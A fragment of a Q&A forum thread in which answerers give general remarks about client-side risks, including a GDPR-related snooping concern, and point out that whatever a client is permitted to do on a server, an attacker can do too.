                        • Someone uses it to snoop on your users. Hel-lo, breach of GDPR.





                            answered 10 hours ago
                            520





















                                0














                                It looks like you're looking for danger to the server (including SQL etc.), not the client, so many dangers don't apply.



                                But there is a danger to the server from what the client is allowed to do on the server. If the client has permission to change the database, so can an attacker. And the same goes for anything a client has permission to do on the server.






                                edited 17 hours ago

























                                answered 18 hours ago









                                User42User42

                                1773


























                                Sai Kumar is a new contributor. Be nice, and check out our Code of Conduct.






























































